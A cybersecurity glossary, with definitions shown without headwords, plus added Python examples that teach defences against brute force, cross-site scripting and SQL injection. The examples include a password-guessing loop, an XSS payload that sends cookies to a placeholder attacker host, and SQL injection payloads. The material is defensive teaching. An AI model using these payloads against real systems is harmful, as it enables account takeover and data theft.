Definition: official recognition that an organisation has the competence and impartiality to perform certification, testing, audits and inspections.
Within cyber and information security standards this usually refers to the accreditation a certification body receives in order to be able to audit and certify that other organisations adhere to specific standards. For example, a certification body must be accredited by IASME in order to audit your organisation and award a Cyber Essentials certificate.
Definition: a computer program that performs tasks on behalf of a user or another program.
Definition: scanning of devices with the use of a software application installed on the target systems. This can provide deeper insight.
Definition: scanning without the installation of additional software agents or components on the target systems or devices. This is less intrusive but may provide limited information.
Definition: authorised applications for use within organisations. Also referred to as a whitelist.
Definition: software designed to detect, prevent and remove malicious software such as trojans, viruses and worms.
Definition: penetration testing where the ethical hacker has no prior knowledge of the system under test. This simulates an attack by an outsider with no inside information about the organisation.
Definition: hackers who have malicious or criminal intent.
Definition: in a simulated cyber-attack, the blue team are responsible for defending the systems. Larger organisations will often organise their cyber security teams into Blue and Red teams.
Definition: a network of compromised devices (referred to as bots) that are controlled by a single malicious actor. These botnets can be used for cybercrime such as launching distributed denial-of-service (DDoS) attacks, sending spam, or stealing information.
Definition: an incident in which data, computer systems or networks are accessed or affected without authorisation, resulting in a compromise of the confidentiality, integrity or availability of information or data.
Definition: the practice of allowing employees to use their own computer devices for work purposes. This may be cost-effective, but comes with new cyber security considerations to be made.
Definition: a hacking technique where an attacker attempts to gain access to a system or account by trying many possible combinations of passwords until the correct one is found.
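The control that defeats online password guessing is to make each guess expensive and to stop accepting guesses after a few failures. The following is an added example, not code from the original page: a small in-memory authenticator (constructed for illustration, with hypothetical usernames and a made-up wordlist) that stores PBKDF2 hashes, compares them in constant time, locks an account for a fixed period after five consecutive failures, and an attacker-style guessing loop that shows the lockout firing long before a short wordlist is exhausted.

```python
"""Slowing down and locking out online password guessing (added example)."""
import hashlib
import hmac
import os
import time

PBKDF2_ROUNDS = 100_000   # cost factor: each guess costs the attacker this many SHA-256 rounds
MAX_FAILURES = 5          # lock the account after this many consecutive failures
LOCKOUT_SECONDS = 900     # 15-minute lockout


def hash_password(password: str, salt: bytes = b"") -> tuple:
    """Return (salt, PBKDF2-HMAC-SHA256 digest); a fresh random salt is drawn when none is given."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return salt, digest


class Authenticator:
    """In-memory user store with per-account failure counting (constructed for illustration)."""

    def __init__(self, clock=time.monotonic):
        self._clock = clock        # injectable so the lockout expiry can be tested
        self._users = {}           # username -> (salt, digest)
        self._failures = {}        # username -> (consecutive failures, locked_until)

    def add_user(self, username: str, password: str) -> None:
        self._users[username] = hash_password(password)

    def is_locked(self, username: str) -> bool:
        _, locked_until = self._failures.get(username, (0, 0.0))
        return self._clock() < locked_until

    def login(self, username: str, password: str) -> str:
        """Return 'ok', 'denied' or 'locked'. Unknown usernames get the same timing and answer as wrong passwords."""
        if self.is_locked(username):
            return "locked"
        record = self._users.get(username)
        if record is None:
            hash_password(password, b"\x00" * 16)   # burn the same time for unknown users
            ok = False
        else:
            salt, digest = record
            ok = hmac.compare_digest(hash_password(password, salt)[1], digest)
        if ok:
            self._failures.pop(username, None)
            return "ok"
        count, locked_until = self._failures.get(username, (0, 0.0))
        if locked_until and self._clock() >= locked_until:
            count = 0                               # an earlier lockout has expired; count afresh
        count += 1
        locked_until = self._clock() + LOCKOUT_SECONDS if count >= MAX_FAILURES else 0.0
        self._failures[username] = (count, locked_until)
        return "locked" if locked_until else "denied"


def brute_force(auth: Authenticator, username: str, wordlist) -> tuple:
    """Online guessing loop as an attacker would run it. Returns (password or None, guesses made)."""
    for attempt, guess in enumerate(wordlist, 1):
        result = auth.login(username, guess)
        if result == "ok":
            return guess, attempt
        if result == "locked":
            return None, attempt
    return None, len(wordlist)


if __name__ == "__main__":
    # Constructed demo: a six-word list whose last entry is the real password.
    auth = Authenticator()
    auth.add_user("alice", "correct horse battery staple")
    words = ["123456", "password", "letmein", "qwerty", "abc123", "correct horse battery staple"]
    print(brute_force(auth, "alice", words))       # lockout stops the attack at guess 5
    print(auth.login("alice", "correct horse battery staple"))   # even the right password is refused while locked
```

The lockout is per account; a real deployment also throttles per source IP and alerts on many locked accounts, since an attacker spraying one common password across many usernames never trips a per-account counter.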
Definition: developing strategies and processes to ensure that an organisation can continue operating, or quickly recover, in the event of unexpected disruptions such as cyber-attacks.
Definition: a certification that demonstrates an individual’s ability to apply best practices to cloud security architecture, design and more.
Definition: a certification awarded to individuals who have demonstrated their expertise in identifying and addressing security vulnerabilities and weaknesses in computer systems, networks, and applications. These individuals carry out security testing.
Definition: a certification for professionals who manage an enterprise’s information security. Focuses on governance, risk management, and compliance.
Definition: an organisation that has been accredited.
Definition: converts a message from plaintext into ciphertext.
Definition: encrypted data; the unreadable output of a cipher, which can only be turned back into plaintext with the correct key.
Definition: using a network of remote servers hosted on the internet to store, manage and process data and run applications, rather than doing these tasks on a local computer or server.
Definition: a standardised way to identify and reference specific vulnerabilities. This is a list of publicly disclosed information about security vulnerabilities.
Definition: a framework for assessing and scoring the severity of security vulnerabilities.
This is the automated process of continuously scanning computer systems, applications, or networks for weaknesses. In the case of Cyber Safe, the information found is presented in an interactive dashboard, allowing for real-time remediation.
Definition: a professional body for individuals and organisations engaged in penetration testing and cybersecurity assessment services. To become a member of CREST you must undertake assessments.
Definition: an attacker injects malicious script into a trusted web page, which is then run in the browsers of the other users who view that page.
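The whole vulnerability is one missing step: output encoding. The following is an added example, not code from the original page; it shows a page builder that interpolates a query parameter straight into HTML beside the same builder with `html.escape` applied, for both a text context and a quoted attribute context. The attacker input is constructed for the demonstration (the `attacker.invalid` hostname is a reserved placeholder, not a real site).

```python
"""Reflected XSS: an unescaped page builder beside its escaped forms (added example)."""
from html import escape

# Constructed attacker payloads: one for a text context, one that tries to break out of an attribute.
SCRIPT_PAYLOAD = '<script>document.location="https://attacker.invalid/?c="+document.cookie</script>'
ATTRIBUTE_PAYLOAD = '" onfocus="alert(1)" autofocus="'


def render_vulnerable(name: str) -> str:
    """Untrusted input spliced into markup: the browser parses the payload as a <script> element."""
    return f"<h1>Hello, {name}!</h1>"


def render_safe(name: str) -> str:
    """html.escape turns < > & " ' into entities, so the browser shows the payload as text."""
    return f"<h1>Hello, {escape(name, quote=True)}!</h1>"


def render_attribute_safe(name: str) -> str:
    """Attribute context: the value must be quoted AND escaped with quote=True, or '" onfocus=' escapes it."""
    return f'<input type="text" name="who" value="{escape(name, quote=True)}">'


def contains_live_markup(page: str) -> bool:
    """Crude detector used only to show the difference: is an unescaped tag or event handler present?"""
    lowered = page.lower()
    return "<script" in lowered or '" onfocus=' in lowered


if __name__ == "__main__":
    print(render_vulnerable(SCRIPT_PAYLOAD))          # script executes in the victim's browser
    print(render_safe(SCRIPT_PAYLOAD))                # &lt;script&gt;... rendered as harmless text
    print(render_attribute_safe(ATTRIBUTE_PAYLOAD))   # &quot; keeps the value inside the attribute
```

Escaping must match the context the data lands in: the HTML-entity escaping shown here is not sufficient inside a `<script>` block, a URL, or a CSS value, each of which needs its own encoder. A Content-Security-Policy header that disallows inline script is the usual second layer if an encoder is missed.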
Definition: the self-assessed tier of the Cyber Essentials scheme, as opposed to the audited Cyber Essentials Plus. It is a basic self-assessment questionnaire and is a prerequisite for undergoing assessment for Cyber Essentials Plus.
Definition: a government-backed cyber security scheme that uses certification and assessment to allow organisations to demonstrate their level of protection.
Definition: the protection of devices, services, applications, networks, and the information on them.
Definition: an area of the internet that is only accessible through software such as Tor, typically using onion or I2P domains.
Definition: an attack where a computer is used to flood a server or computer network with packets to overload it and cause it to crash or behave slowly.
Definition: unauthorised applications that are blocked within organisations to protect systems from potentially harmful software. Also referred to as a blacklist (the opposite of an allow list or whitelist).
Definition: evidence of a user’s online activity that they have left behind.
Definition: a type of DoS attack that uses a network of devices to flood a server or computer network. This network of devices that is used in the attack is referred to as a botnet.
Definition: a collection of interconnected devices.
Definition: a unique code assigned to a domain name (used by Nominet for .uk domains) to identify which registrar has control over that domain. Sometimes called an Internet Provider Security (IPS) tag, registrar tag or EPP tag, after the Extensible Provisioning Protocol used between registries and registrars.
Definition: a unique name that identifies a website on the internet. For example, meliuscyber.com. This is made up of the name of the website (MeliusCyber) and the extension or suffix (.com).
Definition: a certification designed for professionals who respond to and manage cybersecurity incidents.
Definition: the process of converting plaintext into ciphertext to make it unreadable to anyone who does not hold the key needed to decrypt it.
Definition: a device that connects to a network and is therefore susceptible to cyber threats.
Definition: a set of eight baseline mitigation strategies published by the Australian Cyber Security Centre (ACSC) for reducing the impact of cyber threats and improving an organisation's security posture.
Definition: someone who uses their hacking abilities for legal and legitimate purposes such as security testing. Not to be confused with the certification Certified Ethical Hacker.
Definition: to take advantage of a vulnerability in a system.
Definition: a regulatory body in the United Kingdom responsible for overseeing financial markets, firms, and ensuring the protection of consumers.
Definition: a digital barrier that protects your computer or network from unwanted or harmful internet traffic.
Definition: a certification that validates a practitioner’s ability to find and mitigate significant security flaws in systems and networks. Individuals with this certification can conduct advanced penetration tests and simulate behaviour of real attackers.
Definition: a body that provides cyber security certifications of all types.
Definition: a cloud-based service provided by Google that allows organisations to manage and secure mobile devices and endpoints used by their employees.
A feature within Google Workspace that allows organizations to manage and secure mobile devices, such as smartphones and tablets, that access Google services.
Definition: an open-source vulnerability scanner.
Definition: penetration testing where the penetration tester has limited knowledge of a system’s internal workings. They may have some information but not complete access or knowledge.
Definition: a mix between white hat and black hat hackers. These hackers may sometimes violate laws or ethical standards, but do not have the malicious intent of a black hat hacker.
Definition: someone who uses their computer skills to gain unauthorised access to computer systems, networks, or data.
Definition: a decoy system or trap to attract potential cybercrime perpetrators. It mimics a vulnerable system and is used to gather information about attackers, their activities, and their tactics.
Definition: the foundation of the world wide web. HTTP is used to load pages on the internet, and can be thought of as the delivery system for information.
Definition: a secure version of HTTP used for secure communication over the internet. This version encrypts the HTTP requests and responses using TLS (the successor to SSL, whose name is still commonly used).
Definition: a cyber security standard designed to help small and medium enterprises become cyber safe.
Definition: a systematic approach to managing an organisation’s information security. It includes policies, processes, procedures and technologies to protect sensitive information.
Definition: someone within an organisation who has access to its systems and data, making them a potential risk for security breaches or data leaks.
Definition: a worldwide association of accreditation bodies. Its primary function is to develop a single worldwide program of conformity assessment which reduces risk for business and its customers by assuring them that accredited certificates may be relied upon. The IAF ensures that the organisations responsible for giving out certifications follow proper rules and standards.
Definition: a professional organisation that focuses on data privacy and security. Privacy laws and regulations vary from country to country, the IAPP takes a global approach by providing a framework and resources that help privacy professionals navigate the varying landscape of privacy laws.
Definition: a numerical label assigned to each device in a computer network that uses the Internet Protocol for communication. It is used as an identifier.
Definition: a peer-to-peer anonymous network layer tool which creates anonymous browsing.
Definition: an international qualification that allows individuals to demonstrate competency in data protection and compliance under GDPR.
The full name of this standard is ISO/IEC 27001, where ISO and IEC stand for the International Organization for Standardization and the International Electrotechnical Commission. A year suffix such as ISO/IEC 27001:2022 refers to the version of the standard in question.
Definition: an internationally recognised standard for information security management systems (ISMS).
Definition: an extension from ISO 27001, it focuses on the privacy element of information security.
Definition: a popular programming language used in website development.
Definition: a type of malware that covertly records the keystrokes made by the victim, without their knowledge, often leading to theft of personal information or login credentials.
Definition: malicious software. Software that is designed to disrupt, damage or gain unauthorised access to a computer system.
Definition: this attack occurs when a malicious actor intercepts traffic on a network, either eavesdropping on the data communicated or manipulating the data as it travels.
Definition: steps that organisations and individuals can take to minimise and address risks.
Definition: a system that helps organisations control and secure mobile devices used by employees, ensuring data security and policy enforcement.
Definition: a security method that requires users to provide two or more different types of verification. Usually this is something you know, such as a password, combined with something you have, such as a phone or hardware token.
Other examples include a PIN code combined with a fingerprint scan (something you are), or a code delivered by SMS or generated by an authenticator app. This adds an extra layer of protection against unauthorised access: a stolen password alone is no longer enough.
Definition: part of the U.S. Department of Commerce, NIST is a United States government agency that develops and promotes standards, guidelines and best practices for cyber security.
Definition: a remote tool that scans for vulnerabilities in devices and applications.
Definition: two or more computers linked enabling shared resources.
Definition: an online self-assessment tool that all organisations must use and be compliant with if they have access to NHS patient data and systems.
Definition: a cyber security certification that demonstrates capability in ethical hacking and penetration testing. It is sought after by many professionals and is known for its challenging assessment.
Definition: software that is publicly available for use and whose source code is freely available for sharing and modification.
Definition: the process of identifying, acquiring, testing and applying software updates (patches) to fix security weaknesses. This is essential to remaining secure and requires daily scanning to ensure it remains up to date.
Definition: a set of security controls that protect payment card data.
Definition: an ethical hacker simulates a cyber-attack on your computer system, network, or application, then provides a report on the weak points that are found.
Definition: a form of social engineering in which a victim is deceived into giving up their personal information. That may be passwords, financial information, or other sensitive data. This typically occurs through emails, false websites, or text messages.
Definition: a financial services sector regulatory body in the United Kingdom that creates financial policies for firms to follow. The PRA also acts as a watchdog for these policies.
Definition: a collaboration between both the red team and the blue team. Together, they can assess and improve an organisation’s security by simulating attacks and defenses.
Definition: a type of malware which demands a ransom payment from the infected victim. Typically, the victim’s files are forcibly encrypted, and a payment is required to decrypt them.
Definition: a group of ethical hackers that are authorised and organised to simulate a cyber attack against an organisation’s security.
Definition: the process of identifying, prioritising and addressing issues, vulnerabilities or weaknesses in an organisation’s systems, networks or processes.
Definition: also known as a Remote Administration Tool. A type of malware in which the victim is tricked into installing a malicious file on their computer. Once installed, the attacker has complete visibility of the victim's computer, including but not limited to real-time screen monitoring, file system access, real-time webcam monitoring, remote file execution and keystroke logging.
Definition: a digital certificate, issued to a website owner by a certificate authority, that authenticates the identity of the site and lets a browser and server establish an encrypted TLS connection (the term "SSL certificate" persists although SSL has been superseded by TLS). Without a valid certificate, browsers will show warnings to users who visit your website with messages such as "your connection is not secure" or "your connection is not private".
Definition: phishing but via SMS.
Definition: an audit standard developed by the American Institute of Certified Public Accountants that evaluates a service organisation’s controls over financial reporting.
Definition: an audit standard developed by the American Institute of Certified Public Accountants that evaluates controls related to security, availability, processing integrity, confidentiality and privacy. Generally adopted by organisations active in the US market.
Definition: a malicious actor deceives a victim in order to manipulate them and gain something.
Definition: a targeted and personalised form of phishing.
Definition: the placement of malicious code in SQL statements to manipulate or access databases. This can lead to the theft of data or malicious alteration of data.
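The defence is not to sanitise the input but to stop the database from ever parsing it as SQL. The following is an added example, not code from the original page: a login lookup built by string formatting beside the same lookup using parameter placeholders, run against a constructed in-memory SQLite database with two hypothetical users, and two classic payloads (a tautology and a comment that truncates the rest of the WHERE clause) to show that only the string-built version is fooled.

```python
"""SQL injection: a string-built query beside its parameterised form (added example)."""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample database; the password hashes are placeholder strings."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT)")
    conn.executemany("INSERT INTO users (username, password_hash) VALUES (?, ?)",
                     [("alice", "hash-of-alice-password"), ("bob", "hash-of-bob-password")])
    return conn


def find_user_vulnerable(conn: sqlite3.Connection, username: str, password_hash: str) -> list:
    # Untrusted input is spliced into the SQL text, so a quote character changes the query's structure.
    query = (f"SELECT id, username FROM users "
             f"WHERE username = '{username}' AND password_hash = '{password_hash}'")
    return conn.execute(query).fetchall()


def find_user_safe(conn: sqlite3.Connection, username: str, password_hash: str) -> list:
    # Placeholders keep code and data separate: the driver binds the values, it never parses them as SQL.
    query = "SELECT id, username FROM users WHERE username = ? AND password_hash = ?"
    return conn.execute(query, (username, password_hash)).fetchall()


# Constructed payloads for the demonstration.
TAUTOLOGY = "' OR '1'='1"   # turns the condition into (... AND password_hash = '') OR '1'='1'
COMMENT_OUT = "bob'--"      # closes the quote and comments away the password check


if __name__ == "__main__":
    db = make_db()
    print(find_user_vulnerable(db, "alice", TAUTOLOGY))   # both users: password check bypassed
    print(find_user_safe(db, "alice", TAUTOLOGY))         # []: payload is just a literal string
    print(find_user_vulnerable(db, COMMENT_OUT, ""))      # bob without any password
    print(find_user_safe(db, COMMENT_OUT, ""))            # []
```

The same rule applies to every database: build the statement with placeholders (`?`, `%s` or `:name` depending on the driver) and bind the values separately. Table and column names cannot be bound, so if those must vary, validate them against a fixed allow list rather than formatting them in.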
Definition: SSL/TLS certificates are only valid for a set period. Publicly trusted certificates currently have a maximum lifetime of 398 days (just over 13 months), after which they must be renewed or the browser warnings described above will appear.
Definition: a programming language designed for managing data held in a relational database.
Definition: a review audit to ensure that an organisation is still adhering to the key elements of an ISO standard. Typically conducted annually.
Definition: a certification that demonstrates an individual’s expertise in identifying and addressing security vulnerabilities in web applications. These individuals have demonstrated knowledge of web application exploits and penetration testing methodology.
Definition: a browser which allows you to access .onion links, enabling (almost) anonymous communication.
Definition: a detailed overview of the threats and weaknesses to your business, allowing for effective remediation management.
Definition: a type of malware that is disguised as legitimate software.
Definition: the government-backed national accreditation body for the United Kingdom. It assesses and accredits organisations providing certification, testing, inspection and calibration services against internationally agreed standards.
Definition: a system that regulates who is authorised to enter a computer system, as well as what actions they are authorised to make within the system.
Definition: malware that self-replicates and spreads from one computer to another by attaching itself to host files or programs, which must be run for the virus to execute.
Definition: a weakness in a security system that can be exploited or triggered by a threat source.
Definition: the scanning of systems to check for weaknesses that correspond to entries in the Common Vulnerabilities and Exposures (CVE) list.
Definition: high-profile individuals who are valuable targets for cyber-attacks. These individuals often have access to sensitive data, large amounts of money, or have decision-making authority.
Definition: a targeted phishing campaign that targets high-profile individuals (or “whales”) such as top executives, government officials, or celebrities.
Definition: a form of penetration testing where the penetration tester has full access and complete knowledge of the target that is being tested.
Definition: malware that can spread through systems and through network connections, emails, or other means. Worms often spread through exploitation of vulnerabilities within an operating system.
Definition: a vulnerability that has not yet been disclosed to the developer or vendor responsible for the software, so no patch exists and defenders have had "zero days" to prepare for its exploitation.